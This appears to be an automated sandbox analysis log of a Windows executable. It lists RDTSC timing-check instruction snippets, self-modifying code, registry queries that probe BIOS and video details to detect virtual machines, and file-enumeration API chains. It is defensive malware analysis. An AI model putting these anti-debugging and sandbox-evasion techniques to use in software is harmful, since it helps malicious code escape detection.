              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C797 second address: D5C79D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C79D second address: D5C7A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C7A6 second address: D5C7AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C7AC second address: D5C7B2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6B516 second address: D6B51C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6B51C second address: D6B523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6B523 second address: D6B52B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6B52B second address: D6B52F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6B09E second address: D6B0C0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA1D8D64E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jnp 00007FA1D8D64E5Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 jg 00007FA1D8D64E56h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6B0C0 second address: D6B0CD instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA1D8D18336h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6F198 second address: D6F1B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D64E62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6ED30 second address: D6ED34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6ED34 second address: D6ED3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7D889 second address: D7D88D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7D88D second address: D7D8A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FA1D8D64E56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jp 00007FA1D8D64E62h 0x00000012 jnc 00007FA1D8D64E56h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7D8A7 second address: D7D8AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7D8AB second address: D7D905 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA1D8D64E5Eh 0x00000008 push eax 0x00000009 pop eax 0x0000000a jng 00007FA1D8D64E56h 0x00000010 push edi 0x00000011 jmp 00007FA1D8D64E68h 0x00000016 pop edi 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c ja 00007FA1D8D64E56h 0x00000022 jmp 00007FA1D8D64E61h 0x00000027 pushad 0x00000028 popad 0x00000029 popad 0x0000002a pushad 0x0000002b jmp 00007FA1D8D64E5Eh 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7D905 second address: D7D90A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80DDE second address: D80DF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007FA1D8D64E56h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80DF0 second address: D80DFE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FA1D8D18342h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80DFE second address: D80E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D86CF8 second address: D86D1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007FA1D8D18349h 0x0000000b jno 00007FA1D8D18336h 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D86D1E second address: D86D25 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D86D25 second address: D86D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jns 00007FA1D8D18336h 0x00000010 push eax 0x00000011 pop eax 0x00000012 je 00007FA1D8D18336h 0x00000018 jmp 00007FA1D8D18341h 0x0000001d popad 0x0000001e push ecx 0x0000001f jo 00007FA1D8D18336h 0x00000025 pop ecx 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D87008 second address: D8701A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA1D8D64E56h 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8701A second address: D8701E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8701E second address: D87022 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D87022 second address: D8703B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FA1D8D18341h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D871C5 second address: D871CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D871CB second address: D871F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FA1D8D18344h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007FA1D8D18336h 0x00000014 jmp 00007FA1D8D1833Ah 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D87363 second address: D8736D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA1D8D64E56h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D874E7 second address: D874EF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8BD1C second address: D8BD20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8BD20 second address: D8BD24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9CBE3 second address: C9CBFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D64E5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jl 00007FA1D8D64E5Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D97EC9 second address: D97EE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA1D8D18347h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAAAC8 second address: DAAAD2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA1D8D64E56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAAAD2 second address: DAAAD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAAAD8 second address: DAAAEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA1D8D64E61h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAAAEE second address: DAAAF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAAAF4 second address: DAAAFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAA73C second address: DAA746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA1D8D18336h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAA746 second address: DAA74A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAA74A second address: DAA761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FA1D8D1833Fh 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAA761 second address: DAA76D instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA1D8D64E5Eh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC0436 second address: DC043A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC043A second address: DC0479 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA1D8D64E56h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jmp 00007FA1D8D64E61h 0x00000016 jmp 00007FA1D8D64E65h 0x0000001b popad 0x0000001c pop edi 0x0000001d pushad 0x0000001e push eax 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBF289 second address: DBF2AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D18349h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007FA1D8D18338h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBF3F9 second address: DBF3FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBF3FF second address: DBF403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBF403 second address: DBF421 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA1D8D64E64h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBF421 second address: DBF474 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D18340h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jmp 00007FA1D8D18349h 0x0000000f jmp 00007FA1D8D1833Bh 0x00000014 pop ebx 0x00000015 popad 0x00000016 je 00007FA1D8D1834Dh 0x0000001c jmp 00007FA1D8D1833Fh 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBF5A0 second address: DBF5B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D64E5Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBF5B3 second address: DBF5E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 ja 00007FA1D8D18336h 0x0000000d jmp 00007FA1D8D1833Fh 0x00000012 pop edi 0x00000013 pop edx 0x00000014 push esi 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 jnp 00007FA1D8D18336h 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBF5E4 second address: DBF5E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBF5E8 second address: DBF5EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBF722 second address: DBF726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBF726 second address: DBF72C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBF8E1 second address: DBF8E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBFCDE second address: DBFCE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBFFE5 second address: DBFFE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBFFE9 second address: DBFFFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D1833Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBFFFC second address: DC0005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC5EBF second address: DC5EC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC7ED4 second address: DC7EDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC7EDD second address: DC7EE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC7EE1 second address: DC7EE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51001FC second address: 5100200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100200 second address: 5100204 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100204 second address: 510020A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 510020A second address: 5100253 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, esi 0x00000005 pushfd 0x00000006 jmp 00007FA1D8D64E5Eh 0x0000000b sbb si, CC58h 0x00000010 jmp 00007FA1D8D64E5Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a jmp 00007FA1D8D64E69h 0x0000001f xchg eax, ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100253 second address: 5100257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100257 second address: 510025D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 510025D second address: 510029F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D18342h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FA1D8D18340h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FA1D8D18347h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 510029F second address: 51002B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1D8D64E64h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51002B7 second address: 51002BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDEBDF second address: CDEBE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDEBE3 second address: CDEBE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B2FA23 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B2F923 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: CD2A50 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: CFDC9A instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: D5F514 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_1-28558
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_1-27376
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.6 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008F19F0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_008F19F0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008F3A70 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_008F3A70
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008EDB80 lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_008EDB80
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008F13A0 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_008F13A0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008F13B9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_008F13B9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008FE3F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_008FE3F0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008F4C89 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_008F4C89
